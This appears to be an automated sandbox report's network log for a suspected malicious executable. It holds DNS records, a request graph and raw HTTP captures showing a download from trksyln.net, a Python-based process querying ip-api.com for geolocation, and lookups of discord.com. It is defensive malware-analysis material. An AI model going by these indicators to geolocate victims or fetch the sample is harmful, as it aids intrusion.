Oct 31, 2024 19:19:34.438450098 CET	1.1.1.1	192.168.2.4	0x3dd8	No error (0)	pr-bh.ybp.yahoo.com	ds-pr-bh.ybp.gysm.yahoodns.net		CNAME (Canonical name)	IN (0x0001)	false
Oct 31, 2024 19:19:34.440098047 CET	1.1.1.1	192.168.2.4	0x2e06	No error (0)	dis.criteo.com	widget.nl3.vip.prod.criteo.com		CNAME (Canonical name)	IN (0x0001)	false
Oct 31, 2024 19:19:34.440330029 CET	1.1.1.1	192.168.2.4	0x3998	No error (0)	dis.criteo.com	widget.nl3.vip.prod.criteo.com		CNAME (Canonical name)	IN (0x0001)	false
Oct 31, 2024 19:19:34.440330029 CET	1.1.1.1	192.168.2.4	0x3998	No error (0)	widget.nl3.vip.prod.criteo.com		178.250.1.9	A (IP address)	IN (0x0001)	false
Oct 31, 2024 19:19:34.449698925 CET	1.1.1.1	192.168.2.4	0x3a2b	No error (0)	gtrace.mediago.io		35.214.168.80	A (IP address)	IN (0x0001)	false
Oct 31, 2024 19:19:34.563087940 CET	1.1.1.1	192.168.2.4	0x6d0d	No error (0)	ads.travelaudience.com		35.190.0.66	A (IP address)	IN (0x0001)	false
Oct 31, 2024 19:19:34.566612959 CET	1.1.1.1	192.168.2.4	0x8f6d	No error (0)	onetag-sys.com		51.89.9.252	A (IP address)	IN (0x0001)	false
Oct 31, 2024 19:19:34.566612959 CET	1.1.1.1	192.168.2.4	0x8f6d	No error (0)	onetag-sys.com		51.89.9.253	A (IP address)	IN (0x0001)	false
Oct 31, 2024 19:19:34.566612959 CET	1.1.1.1	192.168.2.4	0x8f6d	No error (0)	onetag-sys.com		51.89.9.254	A (IP address)	IN (0x0001)	false
Oct 31, 2024 19:19:34.566612959 CET	1.1.1.1	192.168.2.4	0x8f6d	No error (0)	onetag-sys.com		51.75.86.98	A (IP address)	IN (0x0001)	false
Oct 31, 2024 19:19:34.566612959 CET	1.1.1.1	192.168.2.4	0x8f6d	No error (0)	onetag-sys.com		51.38.120.206	A (IP address)	IN (0x0001)	false
Oct 31, 2024 19:19:34.566612959 CET	1.1.1.1	192.168.2.4	0x8f6d	No error (0)	onetag-sys.com		51.89.9.251	A (IP address)	IN (0x0001)	false
Oct 31, 2024 19:19:35.824080944 CET	1.1.1.1	192.168.2.4	0xbfd3	No error (0)	widget.us.criteo.com	widget.us5.vip.prod.criteo.com		CNAME (Canonical name)	IN (0x0001)	false
Oct 31, 2024 19:19:35.824080944 CET	1.1.1.1	192.168.2.4	0xbfd3	No error (0)	widget.us5.vip.prod.criteo.com		74.119.117.16	A (IP address)	IN (0x0001)	false
Oct 31, 2024 19:19:35.824124098 CET	1.1.1.1	192.168.2.4	0xf51	No error (0)	widget.us.criteo.com	widget.us5.vip.prod.criteo.com		CNAME (Canonical name)	IN (0x0001)	false
Oct 31, 2024 19:19:38.649017096 CET	1.1.1.1	192.168.2.4	0x5169	No error (0)	ep1.adtrafficquality.google			65	IN (0x0001)	false
Oct 31, 2024 19:19:38.649161100 CET	1.1.1.1	192.168.2.4	0x1653	No error (0)	ep1.adtrafficquality.google		216.58.206.34	A (IP address)	IN (0x0001)	false
Oct 31, 2024 19:19:40.145904064 CET	1.1.1.1	192.168.2.4	0xd1ea	No error (0)	odr.mookie1.com	tagr-pixel-nginx-odr-euw4.mookie1.com		CNAME (Canonical name)	IN (0x0001)	false
Oct 31, 2024 19:19:40.145953894 CET	1.1.1.1	192.168.2.4	0x7d85	No error (0)	odr.mookie1.com	tagr-pixel-nginx-odr-euw4.mookie1.com		CNAME (Canonical name)	IN (0x0001)	false
Oct 31, 2024 19:19:40.145953894 CET	1.1.1.1	192.168.2.4	0x7d85	No error (0)	tagr-pixel-nginx-odr-euw4.mookie1.com		34.160.236.64	A (IP address)	IN (0x0001)	false
Oct 31, 2024 19:19:40.154146910 CET	1.1.1.1	192.168.2.4	0xd3d3	No error (0)	googleads.g.doubleclick.net			65	IN (0x0001)	false
Oct 31, 2024 19:19:40.154397964 CET	1.1.1.1	192.168.2.4	0xae1a	No error (0)	cm.g.doubleclick.net		172.217.16.194	A (IP address)	IN (0x0001)	false
Oct 31, 2024 19:19:40.155164957 CET	1.1.1.1	192.168.2.4	0x10c8	No error (0)	googleads.g.doubleclick.net		142.250.186.98	A (IP address)	IN (0x0001)	false
Oct 31, 2024 19:19:40.155177116 CET	1.1.1.1	192.168.2.4	0x6794	No error (0)	widget.us.criteo.com	widget.us5.vip.prod.criteo.com		CNAME (Canonical name)	IN (0x0001)	false
Oct 31, 2024 19:19:40.155177116 CET	1.1.1.1	192.168.2.4	0x6794	No error (0)	widget.us5.vip.prod.criteo.com		74.119.117.16	A (IP address)	IN (0x0001)	false
Oct 31, 2024 19:19:40.155858040 CET	1.1.1.1	192.168.2.4	0x9d30	No error (0)	widget.us.criteo.com	widget.us5.vip.prod.criteo.com		CNAME (Canonical name)	IN (0x0001)	false
Oct 31, 2024 19:19:40.182312965 CET	1.1.1.1	192.168.2.4	0xfa22	No error (0)	ep2.adtrafficquality.google		216.58.206.65	A (IP address)	IN (0x0001)	false
Oct 31, 2024 19:19:41.365277052 CET	1.1.1.1	192.168.2.4	0x727d	No error (0)	ep1.adtrafficquality.google		142.250.185.66	A (IP address)	IN (0x0001)	false
Oct 31, 2024 19:19:41.365289927 CET	1.1.1.1	192.168.2.4	0xc795	No error (0)	ep1.adtrafficquality.google			65	IN (0x0001)	false
Oct 31, 2024 19:19:41.771852016 CET	1.1.1.1	192.168.2.4	0x5eb1	No error (0)	ep2.adtrafficquality.google		142.250.186.33	A (IP address)	IN (0x0001)	false
Oct 31, 2024 19:19:45.178270102 CET	1.1.1.1	192.168.2.4	0xa1a1	No error (0)	ep2.adtrafficquality.google		172.217.16.193	A (IP address)	IN (0x0001)	false
Oct 31, 2024 19:19:54.964523077 CET	1.1.1.1	192.168.2.4	0xcc65	No error (0)	ip-api.com		208.95.112.1	A (IP address)	IN (0x0001)	false
Oct 31, 2024 19:19:56.119106054 CET	1.1.1.1	192.168.2.4	0x445f	No error (0)	discord.com		162.159.128.233	A (IP address)	IN (0x0001)	false
Oct 31, 2024 19:19:56.119106054 CET	1.1.1.1	192.168.2.4	0x445f	No error (0)	discord.com		162.159.138.232	A (IP address)	IN (0x0001)	false
Oct 31, 2024 19:19:56.119106054 CET	1.1.1.1	192.168.2.4	0x445f	No error (0)	discord.com		162.159.136.232	A (IP address)	IN (0x0001)	false
Oct 31, 2024 19:19:56.119106054 CET	1.1.1.1	192.168.2.4	0x445f	No error (0)	discord.com		162.159.135.232	A (IP address)	IN (0x0001)	false
Oct 31, 2024 19:19:56.119106054 CET	1.1.1.1	192.168.2.4	0x445f	No error (0)	discord.com		162.159.137.232	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

trksyln.net

https:

code.jquery.com

cdn.jsdelivr.net

analytics.google.com

td.doubleclick.net

stats.g.doubleclick.net

upload.wikimedia.org

fundingchoicesmessages.google.com

www.google.com

odr.mookie1.com

sync2-dsp.e-volution.ai

sync.ipredictive.com

dsp.adkernel.com

www.temu.com

bh.contextweb.com

s.uuidksinc.net

sync.srv.stackadapt.com

um.simpli.fi

match.prod.bidr.io

dis.criteo.com

gtrace.mediago.io

match.adsrvr.org

pr-bh.ybp.yahoo.com

ads.travelaudience.com

onetag-sys.com

widget.us.criteo.com

ep1.adtrafficquality.google

ep2.adtrafficquality.google

discord.com

otelrules.azureedge.net

www.trksyln.net

ip-api.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49738	160.153.155.187	80	7284	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
Oct 31, 2024 19:19:17.909230947 CET	446	OUT	GET /tgmacro/download HTTP/1.1 Host: www.trksyln.net Connection: keep-alive Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9
Oct 31, 2024 19:19:18.540455103 CET	420	IN	HTTP/1.1 301 Moved Permanently Content-Type: text/html; charset=UTF-8 Location: https://trksyln.net/tgmacro/download Server: Microsoft-IIS/10.0 X-Powered-By: ASP.NET X-Powered-By-Plesk: PleskWin Date: Thu, 31 Oct 2024 18:19:17 GMT Content-Length: 159 Data Raw: 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 4d 6f 76 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 3c 68 31 3e 4f 62 6a 65 63 74 20 4d 6f 76 65 64 3c 2f 68 31 3e 54 68 69 73 20 64 6f 63 75 6d 65 6e 74 20 6d 61 79 20 62 65 20 66 6f 75 6e 64 20 3c 61 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 74 72 6b 73 79 6c 6e 2e 6e 65 74 2f 74 67 6d 61 63 72 6f 2f 64 6f 77 6e 6c 6f 61 64 22 3e 68 65 72 65 3c 2f 61 3e 3c 2f 62 6f 64 79 3e Data Ascii: <head><title>Document Moved</title></head><body><h1>Object Moved</h1>This document may be found <a HREF="https://trksyln.net/tgmacro/download">here</a></body>
Oct 31, 2024 19:19:18.750243902 CET	420	IN	HTTP/1.1 301 Moved Permanently Content-Type: text/html; charset=UTF-8 Location: https://trksyln.net/tgmacro/download Server: Microsoft-IIS/10.0 X-Powered-By: ASP.NET X-Powered-By-Plesk: PleskWin Date: Thu, 31 Oct 2024 18:19:17 GMT Content-Length: 159 Data Raw: 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 4d 6f 76 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 3c 68 31 3e 4f 62 6a 65 63 74 20 4d 6f 76 65 64 3c 2f 68 31 3e 54 68 69 73 20 64 6f 63 75 6d 65 6e 74 20 6d 61 79 20 62 65 20 66 6f 75 6e 64 20 3c 61 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 74 72 6b 73 79 6c 6e 2e 6e 65 74 2f 74 67 6d 61 63 72 6f 2f 64 6f 77 6e 6c 6f 61 64 22 3e 68 65 72 65 3c 2f 61 3e 3c 2f 62 6f 64 79 3e Data Ascii: <head><title>Document Moved</title></head><body><h1>Object Moved</h1>This document may be found <a HREF="https://trksyln.net/tgmacro/download">here</a></body>
Oct 31, 2024 19:20:03.549196005 CET	6	OUT	Data Raw: 00 Data Ascii:
Oct 31, 2024 19:20:48.567055941 CET	6	OUT	Data Raw: 00 Data Ascii:

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	51252	208.95.112.1	80	7532	C:\Users\user\Desktop\El9HaBFrFM.exe

Timestamp	Bytes transferred	Direction	Data
Oct 31, 2024 19:19:54.974211931 CET	116	OUT	GET /json/?fields=225545 HTTP/1.1 Host: ip-api.com Accept-Encoding: identity User-Agent: python-urllib3/2.2.3
Oct 31, 2024 19:19:55.618994951 CET	375	IN	HTTP/1.1 200 OK Date: Thu, 31 Oct 2024 18:19:55 GMT Content-Type: application/json; charset=utf-8 Content-Length: 198 Access-Control-Allow-Origin: * X-Ttl: 60 X-Rl: 44 Data Raw: 7b 22 73 74 61 74 75 73 22 3a 22 73 75 63 63 65 73 73 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 2c 22 72 65 67 69 6f 6e 4e 61 6d 65 22 3a 22 54 65 78 61 73 22 2c 22 74 69 6d 65 7a 6f 6e 65 22 3a 22 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 22 2c 22 72 65 76 65 72 73 65 22 3a 22 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 37 2e 73 74 61 74 69 63 2e 71 75 61 64 72 61 6e 65 74 2e 63 6f 6d 22 2c 22 6d 6f 62 69 6c 65 22 3a 66 61 6c 73 65 2c 22 70 72 6f 78 79 22 3a 66 61 6c 73 65 2c 22 71 75 65 72 79 22 3a 22 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 37 22 7d Data Ascii: {"status":"success","country":"United States","regionName":"Texas","timezone":"America/Chicago","reverse":"173.254.250.77.static.quadranet.com","mobile":false,"proxy":false,"query":"173.254.250.77"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49737	160.153.155.187	80	7284	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
Oct 31, 2024 19:20:02.706037998 CET	6	OUT	Data Raw: 00 Data Ascii:

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49741	160.153.155.187	443	7284	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-31 18:19:19 UTC	670	OUT	GET /tgmacro/download HTTP/1.1 Host: trksyln.net Connection: keep-alive Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: none Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-10-31 18:19:20 UTC	208	IN	HTTP/1.1 404 Not Found Content-Type: text/html Server: Microsoft-IIS/10.0 X-Powered-By: ASP.NET X-Powered-By-Plesk: PleskWin Date: Thu, 31 Oct 2024 18:19:20 GMT Connection: close Content-Length: 70
2024-10-31 18:19:20 UTC	70	IN	Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 20 55 52 4c 3d 2f 45 72 72 6f 72 22 20 2f 3e 0d 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><meta http-equiv="refresh" content="0; URL=/Error" /></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49742	160.153.155.187	443	7284	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-31 18:19:21 UTC	693	OUT	GET /Error HTTP/1.1 Host: trksyln.net Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: navigate Sec-Fetch-Dest: document Referer: https://trksyln.net/tgmacro/download Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-10-31 18:19:21 UTC	298	IN	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/10.0 X-AspNetMvc-Version: 5.2 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET X-Powered-By-Plesk: PleskWin Date: Thu, 31 Oct 2024 18:19:21 GMT Connection: close Content-Length: 12566
2024-10-31 18:19:21 UTC	12566	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 27 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 27 20 68 74 74 70 2d 65 71 75 69 76 3d 27 43 6f 6e 74 65 6e 74 2d 54 79 70 65 27 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 27 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 27 20 63 6f 6e 74 65 6e 74 3d 27 49 45 3d 65 64 67 65 27 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 76 69 65 77 70 6f 72 74 27 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8" /> <meta content='text/html; charset=utf-8' http-equiv='Content-Type'> <meta http-equiv='X-UA-Compatible' content='IE=edge'> <meta name='viewport' content="width=device-wi

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49744	160.153.155.187	443	7284	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-31 18:19:21 UTC	594	OUT	GET /favicon.ico HTTP/1.1 Host: trksyln.net Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://trksyln.net/tgmacro/download Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49754	151.101.66.137	443	7284	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-31 18:19:22 UTC	555	OUT	GET /jquery-3.7.1.min.js HTTP/1.1 Host: code.jquery.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" Origin: https://trksyln.net sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: / Sec-Fetch-Site: cross-site Sec-Fetch-Mode: cors Sec-Fetch-Dest: script Referer: https://trksyln.net/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-10-31 18:19:22 UTC	613	IN	HTTP/1.1 200 OK Connection: close Content-Length: 87533 Server: nginx Content-Type: application/javascript; charset=utf-8 Last-Modified: Fri, 18 Oct 1991 12:00:00 GMT ETag: "28feccc0-155ed" Cache-Control: public, max-age=31536000, stale-while-revalidate=604800 Access-Control-Allow-Origin: * Cross-Origin-Resource-Policy: cross-origin Via: 1.1 varnish, 1.1 varnish Accept-Ranges: bytes Date: Thu, 31 Oct 2024 18:19:22 GMT Age: 2541763 X-Served-By: cache-lga21978-LGA, cache-dfw-kdal2120036-DFW X-Cache: HIT, HIT X-Cache-Hits: 8746, 1 X-Timer: S1730398763.794325,VS0,VE1 Vary: Accept-Encoding
2024-10-31 18:19:22 UTC	16384	IN	Data Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 37 2e 31 20 7c 20 28 63 29 20 4f 70 65 6e 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75 Data Ascii: /! jQuery v3.7.1 \| (c) OpenJS Foundation and other contributors \| jquery.org/license /!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQu
2024-10-31 18:19:22 UTC	16384	IN	Data Raw: 5d 7d 29 2c 6c 61 73 74 3a 58 28 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 72 65 74 75 72 6e 5b 74 2d 31 5d 7d 29 2c 65 71 3a 58 28 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 72 65 74 75 72 6e 5b 6e 3c 30 3f 6e 2b 74 3a 6e 5d 7d 29 2c 65 76 65 6e 3a 58 28 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 66 6f 72 28 76 61 72 20 6e 3d 30 3b 6e 3c 74 3b 6e 2b 3d 32 29 65 2e 70 75 73 68 28 6e 29 3b 72 65 74 75 72 6e 20 65 7d 29 2c 6f 64 64 3a 58 28 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 66 6f 72 28 76 61 72 20 6e 3d 31 3b 6e 3c 74 3b 6e 2b 3d 32 29 65 2e 70 75 73 68 28 6e 29 3b 72 65 74 75 72 6e 20 65 7d 29 2c 6c 74 3a 58 28 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 76 61 72 20 72 3b 66 6f 72 28 72 3d 6e 3c 30 3f 6e 2b 74 3a 74 3c 6e 3f 74 3a 6e 3b 30 Data Ascii: ]}),last:X(function(e,t){return[t-1]}),eq:X(function(e,t,n){return[n<0?n+t:n]}),even:X(function(e,t){for(var n=0;n<t;n+=2)e.push(n);return e}),odd:X(function(e,t){for(var n=1;n<t;n+=2)e.push(n);return e}),lt:X(function(e,t,n){var r;for(r=n<0?n+t:t<n?t:n;0
2024-10-31 18:19:23 UTC	16384	IN	Data Raw: 74 68 69 73 2c 74 2c 6e 29 3b 63 65 2e 5f 71 75 65 75 65 48 6f 6f 6b 73 28 74 68 69 73 2c 74 29 2c 22 66 78 22 3d 3d 3d 74 26 26 22 69 6e 70 72 6f 67 72 65 73 73 22 21 3d 3d 65 5b 30 5d 26 26 63 65 2e 64 65 71 75 65 75 65 28 74 68 69 73 2c 74 29 7d 29 7d 2c 64 65 71 75 65 75 65 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 65 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 29 7b 63 65 2e 64 65 71 75 65 75 65 28 74 68 69 73 2c 65 29 7d 29 7d 2c 63 6c 65 61 72 51 75 65 75 65 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 71 75 65 75 65 28 65 7c 7c 22 66 78 22 2c 5b 5d 29 7d 2c 70 72 6f 6d 69 73 65 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 2c 72 3d 31 2c 69 3d 63 65 2e 44 65 66 65 72 72 65 64 Data Ascii: this,t,n);ce._queueHooks(this,t),"fx"===t&&"inprogress"!==e[0]&&ce.dequeue(this,t)})},dequeue:function(e){return this.each(function(){ce.dequeue(this,e)})},clearQueue:function(e){return this.queue(e\|\|"fx",[])},promise:function(e,t){var n,r=1,i=ce.Deferred
2024-10-31 18:19:23 UTC	16384	IN	Data Raw: 29 7b 63 65 2e 66 6e 5b 65 5d 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 6f 72 28 76 61 72 20 74 2c 6e 3d 5b 5d 2c 72 3d 63 65 28 65 29 2c 69 3d 72 2e 6c 65 6e 67 74 68 2d 31 2c 6f 3d 30 3b 6f 3c 3d 69 3b 6f 2b 2b 29 74 3d 6f 3d 3d 3d 69 3f 74 68 69 73 3a 74 68 69 73 2e 63 6c 6f 6e 65 28 21 30 29 2c 63 65 28 72 5b 6f 5d 29 5b 61 5d 28 74 29 2c 73 2e 61 70 70 6c 79 28 6e 2c 74 2e 67 65 74 28 29 29 3b 72 65 74 75 72 6e 20 74 68 69 73 2e 70 75 73 68 53 74 61 63 6b 28 6e 29 7d 7d 29 3b 76 61 72 20 5f 65 3d 6e 65 77 20 52 65 67 45 78 70 28 22 5e 28 22 2b 47 2b 22 29 28 3f 21 70 78 29 5b 61 2d 7a 25 5d 2b 24 22 2c 22 69 22 29 2c 7a 65 3d 2f 5e 2d 2d 2f 2c 58 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 Data Ascii: ){ce.fn[e]=function(e){for(var t,n=[],r=ce(e),i=r.length-1,o=0;o<=i;o++)t=o===i?this:this.clone(!0),ce(r[o])[a](t),s.apply(n,t.get());return this.pushStack(n)}});var _e=new RegExp("^("+G+")(?!px)[a-z%]+$","i"),ze=/^--/,Xe=function(e){var t=e.ownerDocument
2024-10-31 18:19:23 UTC	16384	IN	Data Raw: 6f 70 46 69 78 3a 7b 22 66 6f 72 22 3a 22 68 74 6d 6c 46 6f 72 22 2c 22 63 6c 61 73 73 22 3a 22 63 6c 61 73 73 4e 61 6d 65 22 7d 7d 29 2c 6c 65 2e 6f 70 74 53 65 6c 65 63 74 65 64 7c 7c 28 63 65 2e 70 72 6f 70 48 6f 6f 6b 73 2e 73 65 6c 65 63 74 65 64 3d 7b 67 65 74 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 65 2e 70 61 72 65 6e 74 4e 6f 64 65 3b 72 65 74 75 72 6e 20 74 26 26 74 2e 70 61 72 65 6e 74 4e 6f 64 65 26 26 74 2e 70 61 72 65 6e 74 4e 6f 64 65 2e 73 65 6c 65 63 74 65 64 49 6e 64 65 78 2c 6e 75 6c 6c 7d 2c 73 65 74 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 65 2e 70 61 72 65 6e 74 4e 6f 64 65 3b 74 26 26 28 74 2e 73 65 6c 65 63 74 65 64 49 6e 64 65 78 2c 74 2e 70 61 72 65 6e 74 4e 6f 64 65 26 26 74 2e 70 61 72 65 6e 74 Data Ascii: opFix:{"for":"htmlFor","class":"className"}}),le.optSelected\|\|(ce.propHooks.selected={get:function(e){var t=e.parentNode;return t&&t.parentNode&&t.parentNode.selectedIndex,null},set:function(e){var t=e.parentNode;t&&(t.selectedIndex,t.parentNode&&t.parent
2024-10-31 18:19:23 UTC	5613	IN	Data Raw: 64 61 74 61 54 79 70 65 73 5b 30 5d 29 72 65 74 75 72 6e 20 72 3d 65 2e 6a 73 6f 6e 70 43 61 6c 6c 62 61 63 6b 3d 76 28 65 2e 6a 73 6f 6e 70 43 61 6c 6c 62 61 63 6b 29 3f 65 2e 6a 73 6f 6e 70 43 61 6c 6c 62 61 63 6b 28 29 3a 65 2e 6a 73 6f 6e 70 43 61 6c 6c 62 61 63 6b 2c 61 3f 65 5b 61 5d 3d 65 5b 61 5d 2e 72 65 70 6c 61 63 65 28 5a 74 2c 22 24 31 22 2b 72 29 3a 21 31 21 3d 3d 65 2e 6a 73 6f 6e 70 26 26 28 65 2e 75 72 6c 2b 3d 28 41 74 2e 74 65 73 74 28 65 2e 75 72 6c 29 3f 22 26 22 3a 22 3f 22 29 2b 65 2e 6a 73 6f 6e 70 2b 22 3d 22 2b 72 29 2c 65 2e 63 6f 6e 76 65 72 74 65 72 73 5b 22 73 63 72 69 70 74 20 6a 73 6f 6e 22 5d 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 6f 7c 7c 63 65 2e 65 72 72 6f 72 28 72 2b 22 20 77 61 73 20 6e 6f 74 20 63 Data Ascii: dataTypes[0])return r=e.jsonpCallback=v(e.jsonpCallback)?e.jsonpCallback():e.jsonpCallback,a?e[a]=e[a].replace(Zt,"$1"+r):!1!==e.jsonp&&(e.url+=(At.test(e.url)?"&":"?")+e.jsonp+"="+r),e.converters["script json"]=function(){return o\|\|ce.error(r+" was not c

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49753	151.101.193.229	443	7284	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
